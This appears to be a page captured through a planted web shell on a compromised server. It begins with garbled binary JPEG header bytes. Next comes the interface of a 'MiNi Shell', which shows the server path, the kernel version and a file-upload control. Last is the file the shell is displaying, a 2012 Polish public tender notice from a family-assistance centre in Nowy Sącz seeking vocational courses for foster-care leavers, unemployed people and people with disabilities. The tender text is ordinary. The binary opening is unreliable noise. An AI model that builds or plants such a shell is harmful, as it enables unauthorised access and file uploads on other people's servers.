JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121011/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121011/217055-N-2012.html

<p class="kh_header"><b>Nowy Sącz: Usługa w zakresie: organizacja i przeprowadzenie kursów zawodowych dla uczestników projektu pn. W stronę samodzielności i niezależności realizowanego przez Powiatowe Centrum Pomocy Rodzinie w Nowym Sączu wraz z Ośrodkiem Pomocy Społecznej w Piwnicznej Zdroju w ramach Programu Operacyjnego Kapitał Ludzki współfinansowanego przez Unię Europejską ze środków Europejskiego Funduszu Społecznego</b><br>
<b>Numer ogłoszenia: 217055 - 2012; data zamieszczenia: 11.10.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowe Centrum Pomocy Rodzinie , ul. Kilińskiego 72A, 33-300 Nowy Sącz, woj. małopolskie, tel. 0-18 4438251, faks 0-18 4442717.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pcpr-ns.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługa w zakresie: organizacja i przeprowadzenie kursów zawodowych dla uczestników projektu pn. W stronę samodzielności i niezależności realizowanego przez Powiatowe Centrum Pomocy Rodzinie w Nowym Sączu wraz z Ośrodkiem Pomocy Społecznej w Piwnicznej Zdroju w ramach Programu Operacyjnego Kapitał Ludzki współfinansowanego przez Unię Europejską ze środków Europejskiego Funduszu Społecznego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zadanie 1: Kurs komputerowy dla wychowanków placówek opiekuńczo-wychowawczych i rodzin zastępczych lub opuszczających  je.
Liczba uczestników kursu: 1 osoba.
Program zajęć teoretycznych i praktycznych ma obejmować: 60 godzin (1godzina = 45 min.), w tym 20 godzin zajęć teoretycznych i 40 godzin zajęć praktycznych.
Miejsce do wyboru wykonawcy: dowolna sala w Nowym Sączu lub sala w obiekcie PCPR w Nowym Sączu (sala udostępniona bezpłatnie do 12 stanowisk bez wyposażenia w sprzęt). 
Termin realizacji: do 14 grudnia 2012r.
Zadanie 2. Kurs barman - kelner dla wychowanków placówek opiekuńczo-wychowawczych i rodzin zastępczych lub opuszczający je.
Liczba uczestników szkolenia: 3 osoby. 
Program zajęć teoretycznych i praktycznych ma obejmować: 80 godzin (1godzina = 45 min), w tym zajęcia praktyczne.
Miejsce do wyboru wykonawcy: dowolna sala w Nowym Sączu lub sala w obiekcie PCPR w Nowym Sączu (sala udostępniona bezpłatnie do 12 stanowisk bez wyposażenia w sprzęt)..
Termin realizacji: do 14 grudnia 2012r.
Zadanie 3. Kurs angielskiego dla wychowanków placówek opiekuńczo-wychowawczych i rodzin zastępczych lub opuszczający je.
Liczba uczestników szkolenia: 1 osoba. 
Miejsce do wyboru wykonawcy: dowolna sala w Nowym Sączu lub sala w obiekcie PCPR w Nowym Sączu (sala udostępniona bezpłatnie do prowadzenia zajęć teoretycznych dla 12 osób).
Program zajęć teoretycznych i praktycznych ma obejmować: 40 godzin (1godzina=45 min.), w tym zajęcia praktyczne.
Termin realizacji: do 14 grudnia 2012r.
Zadanie 4. Kurs wizażu dla wychowanków placówek opiekuńczo-wychowawczych i rodzin zastępczych lub opuszczający je.
Liczba uczestników szkolenia: 2 osoby. 
Miejsce do wyboru wykonawcy: dowolna sala w Nowym Sączu lub sala w obiekcie PCPR w Nowym Sączu (sala udostępniona bezpłatnie do prowadzenia zajęć teoretycznych dla 12 osób).
Program zajęć teoretycznych i praktycznych ma obejmować: 80 godzin (1godzina=45 min.), w tym zajęcia praktyczne.
Termin realizacji: do 14 grudnia 2012r.
Zadanie 5. Kurs obsługi kasy fiskalnej z fakturowaniem komputerowym dla osób bezrobotnych i wychowanków placówek opiekuńczo-wychowawczych i rodzin zastępczych lub opuszczający je.
Liczba uczestników szkolenia: 2 osoby (1 osoba bezrobotna, 1 wychowanek). 
Miejsce do wyboru wykonawcy: dowolna sala w Nowym Sączu lub sala w Piwnicznej Zdroju lub sala w obiekcie PCPR w Nowym Sączu (sala udostępniona bezpłatnie do prowadzenia zajęć teoretycznych dla 12 osób).
Program zajęć teoretycznych i praktycznych ma obejmować: 80 godzin (1godzina=45 min.), w tym zajęcia praktyczne.
Termin realizacji: do 14 grudnia 2012r.
Zadanie 6. Kurs zbrojarz - betoniarz dla osób bezrobotnych.
Liczba uczestników szkolenia: 1 osoba bezrobotna.
Program zajęć teoretycznych i praktycznych ma obejmować: 80 godzin (1godzina = 45min.), w tym zajęcia praktyczne.
Miejsce do wyboru wykonawcy: dowolna sala w Nowym Sączu lub sala w obiekcie PCPR w Nowym Sączu (sala udostępniona bezpłatnie do 12 stanowisk bez wyposażenia w sprzęt).
Termin realizacji: do 14 grudnia 2012r.
Zadanie 7. Kurs murarz - tynkarz dla osób bezrobotnych.
Liczba uczestników szkolenia: 2 osoba bezrobotne.
Program zajęć teoretycznych i praktycznych ma obejmować: 100 godzin (1godzina = 45min.), w tym zajęcia praktyczne.
Miejsce do wyboru wykonawcy: dowolna sala w Nowym Sączu lub sala w obiekcie PCPR w Nowym Sączu (sala udostępniona bezpłatnie do 12 stanowisk bez wyposażenia w sprzęt).
Termin realizacji: do 14 grudnia 2012r.
Zadanie 8. Kurs zagospodarowania terenów zielonych dla osób niepełnosprawnych .
Liczba uczestników szkolenia: 6 osób niepełnosprawnych.
Program zajęć teoretycznych i praktycznych ma obejmować: 80 godzin (1godzina = 45min.), w tym 20 godzin zajęć teoretycznych i 60 godzin zajęć praktycznych.
Miejsce do wyboru wykonawcy: dowolna sala w Nowym Sączu lub sala w obiekcie PCPR w Nowym Sączu (sala udostępniona bezpłatnie do 12 stanowisk bez wyposażenia w sprzęt).
Termin realizacji: do 14 grudnia 2012r.
Zadanie 9. Kurs decoupage dla osób niepełnosprawnych .
Liczba uczestników szkolenia: 7 osób niepełnosprawnych.
Program zajęć teoretycznych i praktycznych ma obejmować: 40 godzin (1godzina = 45 min.), w tym zajęcia praktyczne.
Miejsce do wyboru wykonawcy: dowolna sala w Nowym Sączu lub sala w obiekcie PCPR w Nowym Sączu (sala udostępniona bezpłatnie do 12 stanowisk bez wyposażenia w sprzęt).
Termin realizacji: do 14 grudnia 2012r.
Zadanie 10. Kurs kulinarny dla osób niepełnosprawnych .
Liczba uczestników szkolenia: 10 osób niepełnosprawnych.
Program zajęć teoretycznych i praktycznych ma obejmować: 40 godzin (1godzina = 45min.), w tym zajęcia praktyczne.
Miejsce do wyboru wykonawcy: dowolna sala w Nowym Sączu lub sala w obiekcie PCPR w Nowym Sączu (sala udostępniona bezpłatnie do 12 stanowisk bez wyposażenia w sprzęt).
Termin realizacji: do 14 grudnia 2012r.
Zadanie 11. Kurs komputerowy dla osób niepełnosprawnych .
Liczba uczestników szkolenia: 8 osób niepełnosprawnych.
Program zajęć teoretycznych i praktycznych ma obejmować: 40 godzin (1godzina = 45min.), w tym zajęcia praktyczne.
Miejsce do wyboru wykonawcy: dowolna sala w Nowym Sączu lub sala w obiekcie PCPR w Nowym Sączu (sala udostępniona bezpłatnie do 12 stanowisk bez wyposażenia w sprzęt).
Termin realizacji: do 14 grudnia 2012r.
Zadanie 12. Kurs fotograficzny dla osób niepełnosprawnych .
Liczba uczestników szkolenia: 5 osób niepełnosprawnych.
Program zajęć teoretycznych i praktycznych ma obejmować: 40 godzin (1godzina = 45min.), w tym zajęcia praktyczne.
Miejsce do wyboru wykonawcy: dowolna sala w Nowym Sączu lub sala w obiekcie PCPR w Nowym Sączu (sala udostępniona bezpłatnie do 12 stanowisk bez wyposażenia w sprzęt).
Termin realizacji: do 14 grudnia 2012r.
Zadanie 13. Kurs florystyczny z obsługą kasy fiskalnej dla osób niepełnosprawnych .
Liczba uczestników szkolenia: 7 osób niepełnosprawnych.
Program zajęć teoretycznych i praktycznych ma obejmować: 80 godzin (1 godzina = 45min.), w tym 20 godzin zajęć teoretycznych i 60 godzin zajęć praktycznych.
Miejsce do wyboru wykonawcy: dowolna sala w Nowym Sączu lub sala w obiekcie PCPR w Nowym Sączu (sala udostępniona bezpłatnie do 12 stanowisk bez wyposażenia w sprzęt).
Termin realizacji: do 14 grudnia 2012r.
Zadanie 14. Kurs nowoczesny sprzedawca wraz z obsługą kasy fiskalnej, terminali płatniczych, komputera oraz z fakturowaniem komputerowym dla osób niepełnosprawnych .
Liczba uczestników szkolenia: 12 osób niepełnosprawnych.
Program zajęć teoretycznych i praktycznych ma obejmować: 80 godzin (1godzina = 45min.), w tym 20 godzin zajęć teoretycznych i 60 godzin zajęć praktycznych.
Miejsce do wyboru wykonawcy: dowolna sala w Nowym Sączu lub sala w obiekcie PCPR w Nowym Sączu (sala udostępniona bezpłatnie do 12 stanowisk bez wyposażenia w sprzęt).
Termin realizacji: do 14 grudnia 2012r.
Zadanie 15. Kurs marketing w języku angielskim poziom zaawansowany dla osób niepełnosprawnych .
Liczba uczestników szkolenia: 1 osoba niepełnosprawna.
Program zajęć teoretycznych i praktycznych ma obejmować: 20 godzin (1godzina = 45min.), w tym zajęcia praktyczne.
Miejsce do wyboru wykonawcy: dowolna sala w Nowym Sączu lub sala w obiekcie PCPR w Nowym Sączu (sala udostępniona bezpłatnie do 12 stanowisk bez wyposażenia w sprzęt).
Termin realizacji: do 14 grudnia 2012r.
WYMOGI OGÓLNE DO WSZYSTKICH KURSÓW:
1.	Szkolenie ma zakończyć się badaniem ewaluacyjnym, przeprowadzonym 
w formie pisemnej, sprawdzającym nabycie, utrwalenie wiedzy i umiejętności praktycznych uczestników szkolenia. 
2.	Zamawiający nie dopuszcza możliwości prowadzenia kursów metodą 
e- learning. 
3.	Miejsce realizacji zamówienia: zaleca się, aby zajęcia teoretyczne i praktyczne odbywały się na terenie miasta Nowy Sącz. Dzienny wymiar godzinowy zajęć nie może przekroczyć 8 godzin dydaktycznych, z zastrzeżeniem, że w trakcie realizacji zajęć dłuższych niż 2 godz. dydaktyczne Wykonawca zapewni po każdych 2 godz. przerwę 15 min. Zamawiający dopuszcza możliwość przeprowadzania kursów na terenie Powiatu Nowosądeckiego. 
4.	Wykonawca zobowiązany jest do organizacji i przeprowadzenia kursów w ramach w/w Projektu, których ilość została określona w SIWZ. Kursy są prowadzone 
w zakresach tematycznych, z których każdy stanowi odrębne zadanie, wg wymogów Zamawiającego oraz w orientacyjnych terminach (zakończenie kursów do 30 listopada 2012 r.) określonych w SIWZ.
5.	Wykonawca zobowiązany jest załączyć do oferty wstępne: Programy merytoryczne kursów z uwzględnieniem czasu trwania sporządzone odrębnie dla każdego z kursu. Programy kursów muszą uwzględniać również realizację zajęć teoretycznych i praktycznych, a w szczególności zakres merytoryczny poszczególnych kursów opisany w SIWZ.
6.	Wykonawca zapewnienia wykwalifikowanych trenerów (min. 1os. na kurs) oraz opiekunów (min. 3os. - zad.8,9,10) posiadających odpowiednie wykształcenie, doświadczenie zawodowe i uprawnienia o ile przepisy prawa nakładają obowiązek ich posiadania. 
7.	Wykonawca zapewnienia uczestnikom catering na czas trwania kursów (drobne ciasteczka, kanapeczki, woda mineralna, kawa, herbata, cukier, śmietanka do kawy) oraz ciepły posiłek w formie 2-daniowego obiadu w przypadku realizacji szkolenia w formie min. 5 godz.dzień (opis posiłku winien być przedłożony Zamawiającemu do akceptacji). 
8.	Wykonawca jest zobowiązany do przedstawienia Zamawiającemu wraz z ofertą wstępnych  programów i harmonogramów zajęć kursów  do akceptacji. 
9.	Wykonawca jest zobowiązany do wystawienia uczestnikom zaświadczenia (certyfikat) o odbytych kursach, których kserokopie potwierdzone za zgodność z oryginałem przekazane zostaną Zamawiającemu.
10.	Wykonawca zobowiązany jest zapewnić dla każdego uczestnika kursu ubezpieczenie NNW w trakcie jego trwania, a także w drodze na nie i z powrotem 
na kwotę minimalną 5.000zł. Kserokopię dokumentu potwierdzającego ubezpieczenie Wykonawca przedłoży Zamawiającemu wraz z fakturą,rachunkiem przed rozpoczęciem kursów. 
11.	Każdy uczestnik szkolenia musi mieć zapewnione materiały szkoleniowe zawierające logowanie oraz informacje o współfinansowaniu zgodnie 
z obowiązującymi wytycznymi Programu Operacyjnego Kapitał Ludzki 2007-2013, zamieszczonymi na stronie internetowej: www.efs.gov.pl zakładka - Zasady promocji, uzgodniony pomiędzy Zamawiającym, a Wykonawcą przed rozpoczęciem szkolenia, w tym zakresie tj. przybory piśmiennicze: komplet długopis i ołówek, co najmniej 60-kartkowy kartkowany notatnik w formacie A4, materiały dydaktyczne, teczka -aktówka na materiały konferencyjne z klipem, kieszenią i wlotem na długopis, zamykana na zrywkę magnetyczną, wielkość A-4. Materiały szkoleniowe należy rozdać uczestnikom szkolenia w pierwszym dniu szkolenia i przechodzą one na własność uczestników po zakończeniu szkolenia, potwierdzenie ich odbioru Zleceniobiorca jest zobowiązany przekazać Zleceniodawcy wraz z dokumentacją ze szkolenia. 
12.	Wykonawca zobowiązany jest do przekazania uczestnikom zajęć informacji na temat współfinansowania przedmiotowych zajęć przez Unię Europejską ze środków Europejskiego Funduszu Społecznego i przekazać Zamawiającemu jedno pisemne oświadczenie w tej sprawie potwierdzającego wykonanie ww wymagania.
13.	Wykonawca zobowiązany jest do prowadzenia dokumentacji odrębnie 
dla każdego zadania (w tym również fotograficznej): dzienna lista obecności 
dla każdego uczestnika; dziennik zajęć zawierający listę obecności oraz wymiar godzin i tematy zajęć; lista osób, które rozpoczęły kurs; lista osób, które ukończyły kursu; lista osób, które nie ukończyły kursu; rejestr wydanych zaświadczeń lub innych dokumentów potwierdzających ukończenie kursu i uzyskanie umiejętności; kopie wydanych certyfikatów i zaświadczeń potwierdzających uczestnictwo w kursie; potwierdzenie zwrotu kosztów dojazdu; potwierdzenie odbioru materiałów szkoleniowych; potwierdzenie korzystania z usługi cateringowej; protokół 
z wewnętrznego egzaminu sprawdzającego, ankiety ewaluacyjne i inne. Dokumenty powinny być opatrzone podpisem osoby prowadzącej oraz wykonawcy. Wzór ww listy Zamawiający udostępni Wykonawcy przed rozpoczęciem zajęć.
14.	Wykonawca zobowiązany jest zapewnić bezpieczeństwo osób uczestniczących 
w kursach, a także warunki pracy zgodne z przepisami bezpieczeństwa i higieny pracy.
15.	 Wykonawca przekaże Zamawiającemu oryginały całości dokumentacji szkolenia w terminie 7 dni od jego zakończenia. 
16.	Wykonawca zobowiązany jest do przeprowadzenia kursu także w przypadku innej od wymienionej w SIWZ liczby osób. Zamawiający zastrzega sobie, 
w uzasadnionych przypadkach, prawo zmiany liczby uczestników poszczególnych kursów. Zamawiający zapłaci Wykonawcy za faktyczną liczbę osób, które uczestniczyły w kursie na podstawie przekazanej imiennej listy uczestników.
17.	Zastosowane metody nauczania muszą uwzględniać indywidualne podejście 
do każdego uczestnika. 
18.	Wykonawca zobowiązany jest do sprawowania nadzoru nad frekwencją uczestników zajęć, a także bieżącego informowania Zamawiającego (pracownika socjalnego) o każdej nieobecności osoby, która planowo powinna uczestniczyć 
w zajęciach.
19.	Wykonawca wyznacza osobę do kontaktu (koordynator)-sprawującą nadzór nad realizacją przedmiotu zamówienia, odpowiedzialną za organizację zajęć, informowanie uczestników o planowanych zajęciach, ściśle współpracuje z pracownikami socjalnymi (przedstawicielami zamawiającego).
20.	 Wykonawca zobowiązany będzie do oznakowanie miejsca kursu oraz wszelkich dokumentów związanych z organizacją zajęć zgodnie z Wytycznymi dotyczącymi oznaczania projektów w ramach Programu Operacyjnego Kapitał Ludzki (zamieszczonymi na stronie www.efs.gov.pl, zakładka Zasady promocji). 
21.	Wykonawca umożliwić pracownikom Zamawiającego przeprowadzenie kontroli prawidłowości realizacji kursów oraz poddać się ewentualnej kontroli Instytucji Wdrażającej (Wojewódzki Urząd Pracy w Krakowie), a także udzielać stosownych wyjaśnień w obszarze związanym z przedmiotem zamówienia, na każde jej żądanie.
22.	 Po zakończeniu poszczególnych kursów Wykonawca zobowiązany jest wystawić dla każdego uczestnika: zaświadczenie o jego ukończeniu lub certyfikat, których wzór i ologowanie zostanie ustalone z Zamawiającym po podpisaniu umowy. 
23.	Wykonawca wystawi fakturę,rachunek po zakończeniu każdej z części zamówienia,zadania..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje możliwość udzielania zamówień uzupełniających, o których mowa w art. 67 ust.1 pkt. 6 ustawy Prawo zamówień publicznych do wysokości 50 % wartości zamówienia przetargowego.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.53.00.00-8, 80.51.00.00-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 14.12.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie żąda wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca spełni warunek jeżeli wykaże wykonanie w przeciągu ostatnich 3 lat co najmniej 2 szkoleń przeprowadzonych w ramach realizacji projektów współfinansowanych ze środków Europejskiego Funduszu Społecznego, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie (należyte wykonanie usług winno być potwierdzone dokumentami np. referencjami). 
W przypadku gdy Wykonawca rozliczał się będzie w walucie innej niż złoty polski, w celu dokonania przeliczenia na złote polskie, należy przyjąć średni kurs danej waluty, opublikowany przez NBP (wg tabeli A kursów średnich walut obcych) w dniu publikacji ogłoszenia o przedmiotowym zamówieniu 
w Biuletynie Zamówień Publicznych. Jeżeli w celu wykazania spełniania warunku w zakresie wiedzy i doświadczenia zamierza polegać na wiedzy 
i doświadczeniu innych podmiotów wówczas zobowiązany jest on zaangażować te podmioty do realizacji zamówienia odpowiednio do zakresu wykazanej wiedzy i doświadczenia tego podmiotu.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca spełni warunek jeżeli wykaże, że osoba,osoby prowadzące posiadają wiedzę i doświadczenie w prowadzeniu szkoleń z zakresu objętego niniejszym zamówieniem</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Wymagania dotyczące dokumentów składanych przez wykonawców, o których mowa w pkt. 11 SIWZ, reguluje m.in. rozporządzenie Prezesa Rady Ministrów z 30 grudnia 2009 w sprawie rodzajów dokumentów, jakich może żądać zamawiający od Wykonawcy oraz form, w jakich te dokumenty mogą być składane (Dz. U. nr 226,poz.1817.).
2. Oświadczenia, o których mowa w pkt. 11.2.1 SIWZ należy przedstawić w oryginale, pozostałe dokumenty wskazane w pkt. 11 SIWZ mogą być przedstawione w formie oryginału  lub kopii poświadczonej i opatrzonej klauzulą za zgodność z oryginałem przez Wykonawcę (tj. osoby posiadające umocowanie prawne do reprezentowania firmy lub przez umocowanego Pełnomocnika). 
3. Dokument wielostronicowy przedłożony w formie kopii winien być potwierdzony 
za zgodność z oryginałem na każdej zapisanej (ponumerowanej) stronie.
4. W przypadku gdy Wykonawcę reprezentuje Pełnomocnik, do oferty należy dołączyć pełnomocnictwo, z którego wynika zakres pełnomocnictwa, z którego wynika zakres umocowania podpisane przez osoby uprawnione do reprezentowania Wykonawcy. 
5. Wykonawcy ubiegający  się wspólnie o udzielenie zamówienia ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo reprezentowania 
w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego pełnomocnictwo należy dołączyć do oferty.
6. Pełnomocnictwo powinno być złożone w oryginale albo w kopii poświadczonej notarialnie.
7. Dokumenty, oświadczenia oraz pełnomocnictwa sporządzone w języku obcym są składane wraz z tłumaczeniem na język polski. 
8. W przypadku wykonawców wspólnie ubiegających się udzielenie zamówienia 
oraz w przypadku podmiotów, o których  mowa w pkt. 11.2.3. SIWZ kopie dokumentów dotyczących odpowiednio Wykonawcy lub tych podmiotów są poświadczone 
za zgodność z oryginałem przez Wykonawcę lub te podmioty.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


